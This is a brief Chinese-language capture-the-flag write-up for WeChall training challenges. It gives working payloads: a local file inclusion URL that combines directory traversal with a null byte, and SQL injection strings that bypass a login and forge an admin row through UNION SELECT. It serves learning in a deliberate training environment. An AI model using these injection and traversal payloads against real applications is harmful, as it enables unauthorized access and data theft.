首页 > 代码库 > WeChall writeup
WeChall writeup
PHP - Local File Inclusion
############################### ### Here is your exploit :) ### ############################### $code = ‘$filename = \‘pages/\‘.(isset($_GET["file"])?$_GET["file"]:"welcome").\‘.html\‘;‘; $code_emulate_pnb = ‘$filename = Common::substrUntil($filename, "\\0");‘; # Emulate Poison Null Byte for PHP>=5.3.4 $code2 = ‘include $filename;‘; ### End of exploit ###
将$code后的.html去掉,则可以构造语句截断url编码后%00,另一方面利用../跳转目录
则提交Payload
http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00
PHP-0817
Payload:
https://www.wechall.net/challenge/php0817/index.php?which=solution
Training:MYSQL I
Payload:
Username=‘admin‘ and 1=1#
Training:MYSQL II
Payload:
username=admin‘ union select 1,‘admin‘,md5(‘password‘);#
WeChall writeup
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。